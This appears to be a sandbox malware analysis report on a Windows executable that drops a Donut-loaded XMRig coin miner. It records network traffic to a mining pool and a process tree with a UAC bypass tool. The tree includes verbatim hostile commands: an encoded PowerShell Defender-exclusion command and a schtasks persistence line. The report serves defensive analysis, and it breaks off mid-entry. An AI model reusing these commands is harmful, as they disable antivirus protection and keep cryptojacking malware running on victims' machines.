add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax+00000018h], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36ff04	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x370000	0x588	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x372000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x36df64	0x36e000	aee2f3223bc97a5bc58b718735399f5f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x370000	0x588	0x600	5f72a8cbd043b5fe2568d32132eb6557	False	0.40625	data	4.256138460572747	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x372000	0xc	0x200	a4336f2d78ed6e275c95815a69f5d9ba	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3700a0	0x244	data			0.46206896551724136
RT_MANIFEST	0x3702e4	0x29e	XML 1.0 document, ASCII text			0.4746268656716418

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T00:16:50.341351+0200	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.6	49759	45.76.89.70	80	TCP
2024-10-08T00:17:09.676958+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.6	49617	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 00:17:09.926096916 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:17:09.933294058 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:17:09.933475018 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:17:09.933782101 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:17:09.940613985 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:17:10.566822052 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:17:10.684897900 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:17:20.847856045 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:17:20.940629005 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:17:42.844085932 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:17:42.886888981 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:01.456768036 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:01.458019018 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:01.458095074 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:01.710004091 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:01.710063934 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:04.877684116 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:04.997067928 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:26.883596897 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:26.996931076 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:49.041654110 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:49.170361996 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:18:49.177587986 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:49.357666969 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:18:49.456510067 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:19:01.102380037 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:19:01.293715000 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:19:10.863399982 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:19:10.996699095 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:19:33.082236052 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:19:33.293428898 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:19:55.059500933 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:19:55.130101919 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:20:16.864274025 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:20:16.936151981 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:20:25.588957071 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:20:25.687434912 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:20:46.872087955 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:20:46.983513117 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:20:56.554950953 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:20:56.793059111 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:21:00.171047926 CEST	49759	80	192.168.2.6	45.76.89.70
Oct 8, 2024 00:21:00.178226948 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:21:00.361864090 CEST	80	49759	45.76.89.70	192.168.2.6
Oct 8, 2024 00:21:00.472162008 CEST	49759	80	192.168.2.6	45.76.89.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 00:17:09.676958084 CEST	49617	53	192.168.2.6	1.1.1.1
Oct 8, 2024 00:17:09.922667027 CEST	53	49617	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 00:17:09.676958084 CEST	192.168.2.6	1.1.1.1	0x22ff	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 00:17:09.922667027 CEST	1.1.1.1	192.168.2.6	0x22ff	No error (0)	pool.hashvault.pro		45.76.89.70	A (IP address)	IN (0x0001)	false
Oct 8, 2024 00:17:09.922667027 CEST	1.1.1.1	192.168.2.6	0x22ff	No error (0)	pool.hashvault.pro		95.179.241.203	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49759	45.76.89.70	80	1320	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 00:17:09.933782101 CEST	568	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx","pass":"","agent":"XMRig/6.15.2 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2019",
Oct 8, 2024 00:17:10.566822052 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 32 64 38 36 62 33 36 30 2d 36 32 33 33 2d 34 61 35 64 2d 39 66 65 66 2d 35 34 66 61 37 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"2d86b360-6233-4a5d-9fef-54fa79e22076","job":{"blob":"1010dabb91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce9200000000c7050a2834dfa00549c0c61a7bd2df3e36eab089c3a6510f120
Oct 8, 2024 00:17:20.847856045 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 30 62 62 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f0bb91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce92000000005f1d3b08701b68f9c95fd8b62be900c703c64d6374404076fd3fa68e50bb8f0860","job_id":"882cf931-d412-4d88-ad1a-92b97
Oct 8, 2024 00:17:42.844085932 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 36 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101086bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce920000000024e23e3d9ed65fe0f2a6117ecd38c579bbb3a1bf33dddbd19c51c2413a63fb1266","job_id":"4c9dafd9-6dda-40f7-937d-dee4a
Oct 8, 2024 00:18:01.456768036 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 36 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101086bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce92000000006d61a41cb2ffba0e5e935c3ccd9a4535f47afda03dd9a9940734b898a477126566","job_id":"70269f7d-0285-461f-85c1-fa8b5
Oct 8, 2024 00:18:01.458019018 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 36 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101086bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce92000000006d61a41cb2ffba0e5e935c3ccd9a4535f47afda03dd9a9940734b898a477126566","job_id":"70269f7d-0285-461f-85c1-fa8b5
Oct 8, 2024 00:18:01.710004091 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 36 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101086bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce92000000006d61a41cb2ffba0e5e935c3ccd9a4535f47afda03dd9a9940734b898a477126566","job_id":"70269f7d-0285-461f-85c1-fa8b5
Oct 8, 2024 00:18:04.877684116 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 63 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109cbc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce92000000008b7c7dfaf239eb14ba91e74fc9426ef2e87526b3a732bfc85d418f8ac90c386f69","job_id":"f5ffa0c1-1153-49c9-8754-96b90
Oct 8, 2024 00:18:26.883596897 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 32 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b2bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce920000000031d507b747d3af12afc1d5b4548602250f276ae5e3cf58c90a21496a4cb6a3c572","job_id":"601c3d52-15c9-42c9-8750-d110f
Oct 8, 2024 00:18:49.041654110 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 38 62 63 39 31 62 38 30 36 36 36 65 35 31 64 33 61 30 33 36 65 61 39 61 31 61 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c8bc91b80666e51d3a036ea9a1a41cdaa5f775e6f9825028271381f44d4f97319aaedbce9200000000818dc9319d43a160a18db6bea3c59dacf85e818c6d4ba7287dafbd8a8e8c9c6173","job_id":"28648d19-da05-4227-8ad5-c0d4f

Target ID:	0
Start time:	18:16:53
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\GcqJPBLD2Q.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GcqJPBLD2Q.exe"
Imagebase:	0xf50000
File size:	3'598'848 bytes
MD5 hash:	831C0B3184FEB755997EE1EC5E474CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	18:16:54
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	18:16:54
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	18:16:55
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\Cool.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Cool.exe"
Imagebase:	0x400000
File size:	2'234'880 bytes
MD5 hash:	DEF89B601B7DDD52A94E15DBD38EAEEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	18:16:55
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"
Imagebase:	0x7ff6fe420000
File size:	82'432 bytes
MD5 hash:	83588784E36FE1894F499CAF5FAD5ED8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, Author: Joe Security Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, Author: Florian Roth
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	18:16:55
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	18:16:55
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	18:16:57
Start date:	07/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff6f2360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	18:16:57
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	18:16:57
Start date:	07/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff6f2870000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	18:17:00
Start date:	07/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff6f2360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	18:16:59
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\services64.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\services64.exe
Imagebase:	0x400000
File size:	2'234'880 bytes
MD5 hash:	DEF89B601B7DDD52A94E15DBD38EAEEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Target ID:	13
Start time:	18:17:00
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	18:17:02
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	18:17:00
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\services64.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\services64.exe
Imagebase:	0x400000
File size:	2'234'880 bytes
MD5 hash:	DEF89B601B7DDD52A94E15DBD38EAEEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	16
Start time:	18:17:00
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, 